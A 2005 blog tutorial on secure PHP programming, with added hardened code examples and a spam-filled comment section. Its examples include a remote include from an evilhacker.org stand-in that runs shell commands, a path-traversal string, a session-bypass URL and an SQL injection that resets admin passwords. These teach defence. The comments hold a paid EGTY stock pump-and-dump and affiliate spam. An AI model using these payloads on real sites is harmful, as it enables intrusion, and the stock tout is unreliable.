Web World: Secure Programming in PHP
Nikhil Sheth

Web World

This site is for PHP, MySQL, Flash... In short, for any web-related stuff.

Tuesday, June 07, 2005

Secure Programming in PHP

Introduction

The goal of this paper is not only to show common threats and challenges of programming secure PHP applications but also to show you practical methods for doing so. The wonderful thing about PHP is that people with little or even no programming experience are able to achieve simple goals very quickly. The problem, on the other hand, is that many programmers are not really aware of what is going on behind the curtains. Security and convenience do not often go hand in hand -- but they can.

Dangers

Files

PHP has some very flexible file handling functions. The include(), require() and fopen() functions accept local path names as well as remote files using URLs. A lot of vulnerabilities I have seen are due to incorrect handling of dynamic file or path names.

Example

A site I will not mention in this article (because the problem still has not been solved) has one script which includes various HTML files and displays them in the proper layout. Have a look at the following URL:

    http://example.com/page.php?i=aboutus.html

The variable $i obviously contains the file name to be included. When you see a URL like this, a lot of questions should come to your mind:
  • Has the programmer considered directory traversals like i=../../../etc/passwd?
  • Does he check for the .html extension?
  • Does he use fopen() to include the files?
  • Has he thought about not allowing remote files?
In this case, every answer was negative. Time to play! Of course, it is now possible to read all the files the httpd user has read access for. But what is even more exciting is the fact that the include() function is used to include the HTML file. Consider this:

    http://example.com/page.php?i=http://evilhacker.org/exec.html

Where exec.html contains a couple of lines of code:

    <?php
    passthru('id');
    passthru('ls -al /etc');
    passthru('ping -c 1 evilhaxor.org');
    passthru('echo You have been hax0red | mail root');
    ?>

I am sure you get the idea. A lot of bad things can be done from here.

Global Variables

By default, PHP writes most of the variables into the global scope. Of course, this is very convenient. On the other hand, you can get lost in large scripts very quickly. Where did that variable come from? If it is not set, where could it come from? All EGPCS (Environment, GET, POST, Cookie, and Server) variables are put into the global scope.

The global associative arrays $HTTP_ENV_VARS, $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_SERVER_VARS and $HTTP_SESSION_VARS will be created when the configuration directive track_vars is set. This allows you to look for a variable only in the place you expect it to come from. Note: As of PHP 4.0.3, track_vars is always turned on.

Example

This security hole was reported to the Bugtraq mailing list by Ismael Peinado Palomo on July 25th, 2001. Mambo Site Server 3.0.x, a dynamic portal engine and content management tool based on PHP and MySQL, is vulnerable to a typical global scope exploit. The code has been modified and simplified. Under the 'admin/' directory, index.php checks whether the password matches the one in the database after posting the form:

    <?php
    if ($dbpass == $pass) {
        session_register("myname");
        session_register("fullname");
        session_register("userid");
        header("Location: index2.php");
    }
    ?>
When the passwords match, the variables $myname, $fullname and $userid are registered as session variables. The user then gets redirected to index2.php. Let us see what happens there:

    <?php
    if (!$PHPSESSID) {
        header("Location: index.php");
        exit(0);
    } else {
        session_start();
        if (!$myname) session_register("myname");
        if (!$fullname) session_register("fullname");
        if (!$userid) session_register("userid");
    }
    ?>
If the session ID has not been set, the user will be directed back to the login screen. If there is a session ID, though, the script will resume the session and will put the previously set session variables into the global scope. Nice. Let us see how we can exploit this. Consider the following URL:

    http://example.ch/admin/index2.php?PHPSESSID=1&myname=admin&fullname=joey&userid=admin

The GET variables $PHPSESSID, $myname, $fullname and $userid are created as global variables by default. So when you look at the if-else structure above, you will notice that the script figures $PHPSESSID is set and that the three variables dedicated to authorizing and identifying the user can be set to anything you want. The database has not even been queried. A quick fix for this problem -- far from a perfect one -- would be to check for $HTTP_SESSION_VARS['userid'] or $_SESSION['userid'] (PHP >= 4.1.0) instead of $userid. If you are serious about making secure web applications, read chapter 3.3.

SQL

Programming in PHP would be boring without a decent SQL database connected to the web server. However, assembling SQL queries with unchecked variables is a dangerous thing to do.

Example

The following bug in PHP-Nuke 5.x was reported to the Bugtraq mailing list on August 3, 2001. It is actually a combination of exploiting global variables and an unchecked SQL query variable. The PHP-Nuke developers decided to add the "nuke" prefix to all tables in order to avoid conflicts with other scripts. The prefix can be changed when multiple Nuke sites are run using the same database. By default, $prefix = "nuke"; is defined in the configuration file config.php. Let us now look at a few lines from the script article.php.

    <?php
    if (!isset($mainfile)) {
        include("mainfile.php");
    }
    if (!isset($sid) && !isset($tid)) {
        exit();
    }
    ?>
And a bit further down: the SQL query.

    <?php
    mysql_query("UPDATE $prefix"._stories." SET counter=counter+1 where sid=$sid");
    ?>
To change the SQL query, we need to make sure $prefix is not set to its default value so we can set an arbitrary value via GET. The configuration file config.php is included in mainfile.php. As we know from the last chapter, we can set the variables $mainfile, $sid and $tid to any value using GET parameters. By doing so, the script will think mainfile.php has been included and $prefix has been set accordingly. Now, we are in a position to execute any SQL query starting with UPDATE. So the following request will set all admin passwords to '1':

    http://example.com/article.php?mainfile=1&sid=1&tid=1&prefix=nuke.authors%20set%20pwd=1%23

The query now looks like this:

    UPDATE nuke.nuke_authors set pwd=1#_stories SET counter=counter+1 where sid=$sid

Of course, anything after # will be considered as a comment and will be ignored.
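
The same counter update written so that neither hole applies: the prefix comes only from configuration, and the story id is validated and bound as a parameter. This is an added example, not PHP-Nuke's code; PDO with an in-memory SQLite database stands in for MySQL (the pdo_sqlite extension is assumed), and the table columns and function names are made up for the demo.

```php
<?php
// Added example, not PHP-Nuke code. PDO with in-memory SQLite stands in for
// MySQL; table columns and helper names are assumptions.

const TABLE_PREFIX = 'nuke';   // comes from configuration, never from the request

/** Build the stories table name from a prefix that matches a strict pattern. */
function stories_table(string $prefix): string
{
    // Identifiers cannot be bound as parameters, so they are validated instead.
    if (preg_match('/\A[a-z][a-z0-9]{0,15}\z/', $prefix) !== 1) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    return $prefix . '_stories';
}

/** Increment the read counter; returns the number of rows changed. */
function bump_counter(PDO $db, $sid): int
{
    // Reject anything that is not a whole positive integer. A bare (int) cast
    // would turn "1 OR 1=1" into 1 and carry on silently.
    $id = filter_var($sid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return 0;
    }
    $sql  = 'UPDATE ' . stories_table(TABLE_PREFIX)
          . ' SET counter = counter + 1 WHERE sid = :sid';
    $stmt = $db->prepare($sql);
    $stmt->bindValue(':sid', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// ---- Constructed demo database ----
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE nuke_stories (sid INTEGER PRIMARY KEY, counter INTEGER NOT NULL DEFAULT 0)');
$db->exec('CREATE TABLE nuke_authors (aid TEXT PRIMARY KEY, pwd TEXT NOT NULL)');
$db->exec("INSERT INTO nuke_stories (sid) VALUES (1)");
$db->exec("INSERT INTO nuke_authors VALUES ('admin', 'constructed-hash')");

// Parameters of the URL shown in the article, decoded into a constructed array.
$request = [
    'mainfile' => '1',
    'sid'      => '1',
    'tid'      => '1',
    'prefix'   => 'nuke.authors set pwd=1#',
];

// Only sid is read from the request; mainfile and prefix are ignored.
$changed = bump_counter($db, $request['sid']);
$pwd = $db->query("SELECT pwd FROM nuke_authors WHERE aid = 'admin'")->fetchColumn();
echo "rows changed: $changed, admin pwd: $pwd\n";

// A tampered id is refused instead of being truncated to its leading digits.
echo 'tampered sid changed ', bump_counter($db, '1 OR 1=1'), " rows\n";

// Even if a prefix from the request reached the helper, it would not pass.
try {
    stories_table($request['prefix']);
} catch (InvalidArgumentException $e) {
    echo 'prefix from request: ', $e->getMessage(), "\n";
}
```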

Secure Programming

Awareness

Before taking any technical measures, you have to realize that you cannot trust any input from external sources. Whether it is a GET or POST parameter or even a cookie, it can be set to anything. User-side JavaScript form checks will not make any difference. ;)

Check User Variables

Every external variable has to be verified. In many cases you can just use type casting. For example, when you pass a database table id as a GET parameter the following line would do the trick:

    $id = (int)$HTTP_GET_VARS['id'];

or

    $id = (int)$_GET['id']; /* PHP >= 4.1.0 */

Now you can be sure $id contains an integer. If somebody tried to modify your SQL query by passing a string, the value would simply be 0. Checking strings is a little more difficult. In my opinion, the only professional way to do this is by using regular expressions. I know that many of you try to avoid them but -- believe me -- they are great fun once you have got the basic idea. As an example, the variable $i from chapter 2.1. can be verified with this expression:

    <?php
    // $i is the file name parameter from chapter 2.1.
    if (ereg("^[a-z]+\.html$", $i)) {
        echo "Good!";
    } else {
        die("Try hacking somebody else's site.");
    }
    ?>

This script will only continue when the $i variable contains a file name starting with some lowercase alphabetic characters and ending with a .html extension. I will not go into regular expression details but I strongly recommend the book "Mastering Regular Expressions" by Jeffrey E. F. Friedl (O'Reilly).
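
A hardened take on the page.php lookup from the Files section, combining the pattern check above with path canonicalisation. This is an added example, not code from the original article; the function name resolve_page() and the temporary demo directory are assumptions, and preg_match() is used because ereg() was removed in PHP 7.0.

```php
<?php
// Added example, not from the original article. The function name and the
// demo directory layout are assumptions made for illustration.

/**
 * Map a user-supplied page name to a file inside $baseDir.
 * Returns the canonical path, or null when the name must be rejected.
 */
function resolve_page(string $baseDir, $name): ?string
{
    // 1. Type check: a request such as ?i[]=x delivers an array.
    if (!is_string($name)) {
        return null;
    }

    // 2. Strict shape: lowercase letters followed by ".html". \A and \z
    //    anchor the whole string; "$" alone would accept a trailing newline.
    if (preg_match('/\A[a-z]+\.html\z/', $name) !== 1) {
        return null;
    }

    // 3. Defence in depth: canonicalise and confirm the result still lives
    //    under the base directory (a symlink could point elsewhere).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return is_file($path) ? $path : null;
}

// ---- Constructed demo: a throwaway pages directory with one file ----
$pages = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_demo_' . getmypid();
if (!is_dir($pages)) {
    mkdir($pages, 0700);
}
$demoFile = $pages . DIRECTORY_SEPARATOR . 'aboutus.html';
file_put_contents($demoFile, "<h1>About us</h1>\n");

// Constructed inputs; the second and third are the values discussed in the
// Files section of the article.
$inputs = [
    'aboutus.html',
    '../../../etc/passwd',
    'http://evilhacker.org/exec.html',
    "aboutus.html\n",
    'missing.html',
    ['aboutus.html'],
];

foreach ($inputs as $input) {
    $label = is_string($input) ? addcslashes($input, "\n") : gettype($input);
    $path  = resolve_page($pages, $input);
    if ($path === null) {
        echo "REJECT  $label\n";
        continue;
    }
    echo "SERVE   $label\n";
    // readfile() copies bytes to the output; unlike include(), it never
    // executes PHP code that the file might contain.
    readfile($path);
}

// Clean up the demo directory.
unlink($demoFile);
rmdir($pages);
```

In a real script the call would be resolve_page(__DIR__ . '/pages', $_GET['i'] ?? null), answering with a 404 when it returns null.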

Master the Global Variable Scope

I am glad I did not have much time to write this article in early December 2001, because in the meantime Andi and Zeev added some very useful arrays in PHP v4.1.0: $_GET, $_POST, $_COOKIE, $_SERVER, $_ENV and $_SESSION. These variables deprecate the old $HTTP_*_VARS arrays and can be used regardless of the scope. There is no need to import them using the global statement within functions.

Do yourself a favour and turn the configuration directive register_globals off. This will cause your GET, POST, Cookie, Server, Environment and Session variables not to be in the global scope anymore. Of course, this requires you to change your coding practice a little. But it is definitely a good thing to know where your variables come from. It will help you prevent security holes described in chapter 2.2. This simple example will show you the difference:

Bad:

    <?php
    function session_auth_check() {
        // $auth is a plain global: with register_globals on, a request
        // parameter named "auth" can set it.
        global $auth;
        if (!$auth) {
            die("Authorization required.");
        }
    }
    ?>

Good:

    <?php
    function session_auth_check() {
        // Read the flag from the session only. empty() also covers a
        // session in which 'auth' was never set.
        if (empty($_SESSION['auth'])) {
            die("Authorization required.");
        }
    }
    ?>

Logging

In a production environment it is a good idea to set the error_reporting level to 0. Use the error_log() function to log errors to a file or even alert yourself via e-mail. If you are really concerned about security, you can even do some preventive "intrusion detection". For example, you could send yourself an e-mail alert when somebody plays with GET/POST/Cookie parameters and the regular expression function returns false accordingly.
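
One way to implement the preventive alert described above, as an added example that is not part of the original article: a validation helper that records every rejected parameter through error_log(). The function name, log format and log file location are assumptions.

```php
<?php
// Added example, not from the original article. Function name, log format
// and log location are assumptions.

/**
 * Return $source[$name] if it matches $pattern; otherwise log the attempt
 * with error_log() and return null.
 */
function checked_param(array $source, string $name, string $pattern, string $logFile): ?string
{
    $value = $source[$name] ?? null;
    if (is_string($value) && preg_match($pattern, $value) === 1) {
        return $value;
    }

    // Make the rejected value safe to log: cap its length and escape quotes,
    // backslashes, control and non-ASCII bytes so it cannot forge log lines.
    $shown = is_string($value)
        ? addcslashes(substr($value, 0, 80), "\0..\37\"\\\177..\377")
        : '(' . gettype($value) . ')';

    $line = sprintf(
        "[%s] rejected input ip=%s param=%s value=\"%s\"\n",
        date('c'),
        $_SERVER['REMOTE_ADDR'] ?? 'cli',
        $name,
        $shown
    );

    // Type 3 appends to a file. Type 1 with an address as the third argument
    // sends the message by e-mail instead, as the article suggests.
    error_log($line, 3, $logFile);
    return null;
}

// ---- Constructed demo ----
$log = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'input_alerts_' . getmypid() . '.log';

// Constructed request parameters: a value that tries to smuggle a second
// log line, the traversal string from the Files section, and a valid name.
$get = [
    'id' => "7\n[2005-06-07T00:00:00+00:00] admin login ok",
    'i'  => '../../../etc/passwd',
    'p'  => 'aboutus.html',
];

$id = checked_param($get, 'id', '/\A[0-9]{1,9}\z/', $log);
$i  = checked_param($get, 'i', '/\A[a-z]+\.html\z/', $log);
$p  = checked_param($get, 'p', '/\A[a-z]+\.html\z/', $log);

var_dump($id, $i, $p);          // the two bad values come back as null
echo file_get_contents($log);   // one escaped line per rejected parameter
unlink($log);
```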

Conclusion

Programming securely definitely needs a little more time than the "Wow, it works!" technique. But as you can see by the examples, you cannot afford to ignore security. I hope I could make you think about how to improve your existing applications and especially how to change your programming practice in the future. Happy hacking!

101 Comments:

  • At 6:17 AM, Anonymous Alberto said…

    I am surprised to see few comments on this blog. It is an excellent blog. I would have expected more debate. Anyway the blog is still pretty good, my congratulations.
    Alberto

     
  • At 9:42 AM, Blogger Niks said…

    Hey, Thanks for comment Alberto

     
  • At 9:26 AM, Blogger abbie593thomas said…

    ='Brand New News From The Timber Industry!!'=

    ========Latest Profile==========
    Energy & Asset Technology, Inc. (EGTY)
    Current Price $0.15
    ================================

    Recognize this undiscovered gem which is poised to jump!!

    Please read the following Announcement in its Entierty and
    Consider the Possibilities
    Watch this One to Trade!

    Because, EGTY has secured the global rights to market
    genetically enhanced fast growing, hard-wood trees!

    EGTY trading volume is beginning to surge with landslide Announcement.
    The value of this Stock appears poised for growth! This one will not
    remain on the ground floor for long.

    Keep Reading!!!!

    ===============
    "BREAKING NEWS"
    ===============

    -Energy and Asset Technology, Inc. (EGTY) owns a global license to market
    the genetically enhanced Global Cedar growth trees, with plans to
    REVOLUTIONIZE the forest-timber industry.

    These newly enhanced Global Cedar trees require only 9-12 years of growth before they can
    be harvested for lumber, whereas worldwide growth time for lumber is 30-50 years.

    Other than growing at an astonishing rate, the Global Cedar has a number of other benefits.
    Its natural elements make it resistant to termites, and the lack of oils and sap found in the wood
    make it resistant to forest fire, ensuring higher returns on investments.

    the wood is very lightweight and strong, lighter than Poplar and over twice
    as strong as Balsa, which makes it great for construction. It also has
    the unique ability to regrow itself from the stump, minimizing the land and
    time to replant and develop new root systems.

    Based on current resources and agreements, EGTY projects revenues of $140 Million
    with an approximate profit margin of 40% for each 9-year cycle. With anticipated
    growth, EGTY is expected to challenge Deltic Timber Corp. during its initial 9-year cycle.

    Deltic Timber Corp. currently trades at over $38.00 a share with about $153 Million in revenues.
    As the reputation and demand for the Global Cedar tree continues to grow around the world
    EGTY believes additional multi-million dollar agreements will be forthcoming. The Global Cedar nursery has produced
    about 100,000 infant plants and is developing a production growth target of 250,000 infant plants per month.

    Energy and Asset Technology is currently in negotiations with land and business owners in New Zealand,
    Greece and Malaysia regarding the purchase of their popular and profitable fast growing infant tree plants.
    Inquiries from the governments of Brazil and Ecuador are also being evaluated.

    Conclusion:

    The examples above show the Awesome, Earning Potential of little
    known Companies That Explode onto Investor�s Radar Screens.
    This stock will not be a Secret for long. Then You May Feel the Desire to Act Right
    Now! And Please Watch This One Trade!!


    GO EGTY!


    All statements made are our express opinion only and should be treated as such.
    We may own, take position and sell any securities mentioned at any time. Any statements that express or involve discussions with respect
    to predictions, goals, expectations, beliefs, plans, projections, objectives, assumptions or future events or performance are
    not statements of historical fact and may be "forward, looking
    statements." forward, looking statements are based on expectations, estimates
    and projections at the time the statements are made that involve a number of risks and uncertainties which could cause actual results
    or events to differ materially from those presently anticipated. This newsletter was paid $3,000 from third party (IR Marketing).
    Forward,|ooking statements in this action may be identified through the use of words such as: "projects", "foresee", "expects". in compliance with Se'ction 17. {b), we disclose the holding of EGTY shares prior to the publication of this report. Be aware of an inherent conflict of interest resulting from such holdings due to our intent to profit from the liquidation of these shares. Shares may be sold at any time, even after positive statements have been made regarding the above company. Since we own shares, there is an inherent conflict of interest in our statements and opinions. Readers of this publication are cautioned not to place undue reliance on forward,looking statements, which are based on certain assumptions and expectations involving various risks and uncertainties that could cause results to
    differ materially from those set forth in the forward- looking statements. This is not solicitation to buy or sell stocks, this text is
    or informational purpose only and you should seek professional advice from registered financial advisor before you do anything related with buying or selling stocks, penny stocks are very high risk and you can lose your entire investment.

     
  • At 7:05 AM, Anonymous Anonymous said…

    affiliate click pay per is great

    i found here searching for the word affiliate click pay per and your site was listed high on the word affiliate click pay per
    GOOD JOB

    affiliate click pay per

     
  • At 9:59 AM, Anonymous Anonymous said…

    This blog is great! If you get a chance you may want to visit this seo tips
    site, it's

    pretty awesome, too!

     
  • At 2:55 PM, Anonymous Anonymous said…

    Hey i got here searching for real estate affiliate program
    Your sites not too bad!

    You got good rankings for them keywords real estate affiliate program

    Check out my site
    real estate affiliate program

     
  • At 1:06 AM, Blogger Johnjon said…

    I discuss this topic daily myself. I also have a website that talks about affiliate r related things. Go check it out if you get a chance.

     
  • At 5:45 PM, Blogger Danny White said…

    Nice blog! I have a free mortgage lead site I thought you and your visitors might like.

    Click on free mortgage lead to check it out. free mortgage lead

     
  • At 6:14 AM, Anonymous Anonymous said…

    "Hi there, I just came across your blog about ad classified free submit and wanted to drop you a note telling you how impressed I was with the information you have posted here. I also have a web site related to ad classified free submit so I know what I am talking about when I say your site is top-notch! Keep up the great work, you are providing a great resource on the Internet here!"

     
  • At 8:51 PM, Anonymous Automotive Mechanics said…

    Hey Niks,

    Your blog "Secure Programming in PHP", leads me to believe you will find my information on our Best Career Wages site to be very beneficial.

    Some of the not so common searches that found our extensive wages site included ...

    Aircraft Mechanics Wages
    Aircraft Service Technicians Wages
    Automotive Body Repairers Wages
    Automotive Glass Installers Wages
    Automotive Glass Repairers Wages
    Automotive Service Technicians Wages
    Automotive Mechanics Wages
    Avionics Technicians Wages.


    We have many hundreds of "essential to read" articles on wages and career topics in addition to many other popular subjects in our Average Career Wages site.

    Best Wishes
    Emily

     
  • At 7:02 AM, Anonymous net web hosting said…

    I love your blog Niks. How long has it been on-line? Reason I ask is I am doing a ton of work in the area of lowcost web hosting and will probably end up starting a blog of my own. Funny how the internet brought me here when I was doing searches on lowcost web hosting. Oh well, I am glad it did. Keep up the great blogging and I am sure I will visit Secure Programming in PHP again!!

     
  • At 6:04 AM, Anonymous web space hosting said…

    Sad to say I just got back from a bowling tournament and decided to log in and do some websurfing. Niks I love your blog. I had some very good laughs. I am doing a paper on lowcost web hosting and have been downloading information for the last hour. I don’t know how I came across Secure Programming in PHP but I am glad I did. It has set me back a little because I have spent the last hour reading your archives. If you don’t mind I would like to add you to my favorites so I can back again and read some more. Well I need to get back to lowcost web hosting. I am almost finished with it. Great job.
    p.s some very good points on your blog

     
  • At 1:34 AM, Anonymous free article submissions said…

    I skim a lot of blogs, and so far yours is in the Top 3 of my list of favorites. I'm going to dive in and try my hand at it, so wish me luck.

    I've got a site you might be interested in (mine is about ezine article submission ) I know, it sounds strange, but it's like anything, once you learn more about it, it's pretty cool. It's mostly about ezine article submission related articles and subjects.

     
  • At 1:14 PM, Anonymous website placement said…

    Hello: Niks, I was looking for some information on website placement and found your site. I'm sure you know how it is when you start to read a interesting post…most time you just have to read it all. Bottom line, I've enjoyed reading your Blog. I’ve got you bookmarked for the future. I'm doing a little test to see how many people actually read these posts. So, for the next few weeks anyone who visits my Blog, I'll send a great 90+ page search engine optimization ebook! Yes, this is a not strings attached deal. Well, I’m off again in search of the info I seek . Thanks for the read!

     
  • At 7:36 PM, Anonymous calgary web hosting said…

    I have been on-line searching for hours for information regarding web hosting company for small business and stumbled across your blog during my journey :-) Niks your blog is really amazing! Keep up the great work. Obviously my search on web hosting company for small business was way off when compared to Secure Programming in PHP and find it funny how it landed me here. The internet is a funny thing. Anyways, great job on your blogging and keep up the good work! I been searching for web hosting company for small business for over 2 hours and needed a break from it. I started reading your blog and really started getting into it.
    P.S I will add you to my favorites so I can come back and visit later
    P.S.S If you want to bookmark my site I am at web hosting company for small business. You never know you may find some good deals!

     
  • At 7:29 PM, Anonymous net web hosting said…

    What up Niks! I just finished up a ten hour work day and decided to kick back and do some surfing. So I grabbed myself a drink and stumbled across your blog while doing some research on calgary web hosting for a upcoming project I am doing. Well even though Secure Programming in PHP isn’t what I was looking for I really enjoyed reading your blog. Your doing a great job and please keep up the good work. Lots of people do not keep their blogs up to date :0) There are some very interesting view points stated here. Anyways I am going to grab the bull by the horns and continue to plug away at calgary web hosting. I have already bookmarked your blog. You many want to visit me at calgary web hosting. You never know you might see something you like! Again great job.

     
  • At 9:28 PM, Anonymous web site for sale said…

    A Useful Blog to Bookmark!!! I have just come back to my desk from a good rest. Feeling great I surf into your blog. The info you have provided is very interesting indeed. Keep up the good work and Feel free to visit the following business opportunity site which has much of all the business opportunity related leads.

    Good Life certainly demands a good income and that is our mission. Our desire is to provide all families worldwide great opportunities to increase their family income so that their children can be well cared for and can get a very good education or the things they can enjoy most and be among the most happy in life.

    Take charge of your life and family, the following sites offer the best home based business opportunities, domains, hosting, search engine submission and marketing:
    Daily Cash Sites, Online Business Opportunities, Cash Income, Egold, Online Payment Commission, Education, Email marketing, Bulk Email, Resell Rights, Marketing, Buy eGold, Websites for Sale, Family Income, Search Engine Traffic, Domains, Web Hosting, Auto Ad Submitter, Web Traffic, Traffic Booster, Sitesell Website, Home Based Business, Domain Hosting, Netsuitestore, Nutritional Supplements, Native Remedies, Herbal Supplements, Anti Aging

    Click on google's:
    Earn High Income, Increase My Income, Online Income Opportunities

    We can all be Blessed more by Blessing others!

    Take care!
    ==============================================

     
  • At 5:24 PM, Anonymous lowcost web hosting said…

    Well I just got back from the gym and I am beat. I am currently doing some research on lowcost web hosting and stumbled across your blog. Which cracks me up really. The internet can certainly land you off base sometimes. Even though Secure Programming in PHP is not completely related I think it is a cool blog. I have read back through the archives and lots of people make some very good points. Well I have been on-line forever it seems. I need to continue to plug away at lowcost web hosting. If you have the energy swing by lowcost web hosting. I try to update my site weekly and maybe you will see something you like. I already snagged your URL and put it in my favorites. If you do not mind I will be back again. Great job!

     
  • At 3:01 AM, Anonymous lingerie web site for sale said…

    A Useful Blog to Bookmark!!! I have just come back to my desk from a good rest. Feeling great I surf into your blog. The info you have provided is very useful. Keep up the good work and Feel free to visit the following established web site for sale site which has much of all the established web site for sale related leads.

    Good Life certainly demands a good income and that is our mission. Our desire is to provide all families worldwide great opportunities to increase their family income so that their children can be well cared for and can get a very good education or the things they can enjoy most and be among the most happy in life.

    Take charge of your life and family, Click and Bookmark the following sites, they offer the best home based business opportunities, domains, hosting, search engine submission and marketing:
    Daily Cash Sites, Online Business Opportunities, Cash Income, Egold, Online Payment Commission, Education, Email marketing, Bulk Email, Resell Rights, Marketing, Buy eGold, Websites for Sale, Family Income, Search Engine Traffic, Domains, Web Hosting, Auto Ad Submitter, Web Traffic, Traffic Booster, Sitesell Website, Home Based Business, Domain Hosting, Netsuitestore.

    Click and Bookmark Google's: Earn High Income, Increase My Income, Online Income Opportunities

    The world's best online marketing software and services are all here for you to choose from. These marketing software and services will determine your many online successes now and in years to come. Click on the hyperlinks for further information ...
    1) The Rich Jerk - Stop Being a Pathetic Loser.
    2) Affiliate Cash Vault - New fail-safe system virtually runs 100% on autopilot. Just set it and forget it!
    3) Google Profits - How to Make Massive Profits Combining the Power of Google and CB.
    4) Google Cash - Official Google Cash How to Earn Thousands Writing Google AdWords Part-Time updated w/ 24 videos.
    5) BlogBlaster Submits To 2 Million Sites - Brand new advertising software submits to 2 million blogs!
    6) Brand New Adwords Software - Become A Super Affiliate Overnight! Software Finds Most Profitable Search Terms And Products For You!
    7) Instantly Increase Your Traffic & Sales - Instant Booster - Incredible Software increases your Income Instantly.
    8) Fire Sale Profits - Discover the Secrets of Successful Fire Sales and How You Can Make A Fortune Selling Downloadable Products!
    9) Easiest Way To Make $100+ A Day SwapClix - Instant Money Generator, Guaranteed Results, Work From Home Make Money Now! We Hide Your Affiliate Id! No Commision Stealing!
    10) Process Instant Rebates Online - Make Money Online! Low Refunds.
    11) The Lazy Pig - Convert $1 To $85 - Undisclosed Revolutionary 7 Step Adsense Marketing System.
    12) AdBlaster Submits To 2,500,000 Sites - AdBlaster blasts to 2,500,000 Websites with just 1 click!
    13) AdSense Gold-Your Fast Track To Profits - Triple your Ctr, skyrocket your Epc, track your clicks by search engine, referrer and more! Learn how to join the AdSense Elite.
    14) 1stPromotion - Pro2 Mall & Portal - The Ultimate CB Mall & Affiliate Portal. The Only Mall That Gives You Total Control. Thousands Of Products, One Url.
    15) The Google Ca$h Machine - Start Earning 15 Minutes from Now! Automatically.
    16) The Article System - Content Generator - Instantly add targeted content to your website. Create pages that search engines will index to boost your traffic and profit!
    17) Massive Targeted Traffic Guaranteed - Amazing Formula Allows You To Drive All The Targeted Website Traffic You Could Ever Possibly Want!
    18) Google Adsense Secrets - Second Edition - Incredible Google Adsense secrets revealed by Pro who earns over $500/day - Breakthrough best-selling eBook - Instant download!
    19) Make Big Money Taking Surveys Online - Get Paid $25.00-75.00 Per Survey Completed! High Conversions! Low Refunds!
    20) Search Engine Cloaker (since 1995) - We are proud to help our customers achieve number 1 rankings in all engines for 10+ years.
    21) Rapid Search Engine Placement. - This product will get your website listed on Msn, Yahoo and Google. Proven technique easy to use!
    22) Super Affiliate Marketer's Secret Weapon - Drive Massive Amounts of Laser-Targeted Traffic to Your Site And Instantly Uncover Niche Markets That You Can Easily Dominate!
    23) 1 Million Free Visitors On Your Website - I have become a multi-millionaire on the Internet by using these secrets! You don't need to buy any advertising online!
    24) AffiliateMoneyTree.com - Huge Payouts - Make $18,659 a Month on Google Adwords! (Tip: Promote People-Search.com on Adwords using conversion tracking! Huge $ Niche!
    25) Online Gold Finder - Online Gold Finder will help you find hidden profitable online niches in seconds.
    26) Your License To Print Money System - Combine CB & AdWords for guaranteed income.
    27) Secrets Of The Big Dogs - eBook detailing Internet promotion techniques.
    28) 2Bucks' An Ad Advertising Program - Ads in multiple ezines for $1.00 each (or less) 80 ezines, 1,280,000+ subs. (Oct 2005).
    29) Turn Words Into Traffic - Simple 'traffic Machine' Creates Instant Avalanche of Free Traffic to your website or affiliate links!
    30) Ez Search Engine Optimization - Search engine optimization tips & advice.
    31) The Next Generation Rss (Seo) Software - The Seo experts don't want you know about this powerful tool
    32) Ad Word Generator - Brand New Software that Instantly Creates Profitable Google Adwords!
    33) Get Organized Now - Ideas, tips, tools and more to help you organize your home, your office and your life!
    34) Secret Spider Generator - The Key to Google's Back Door.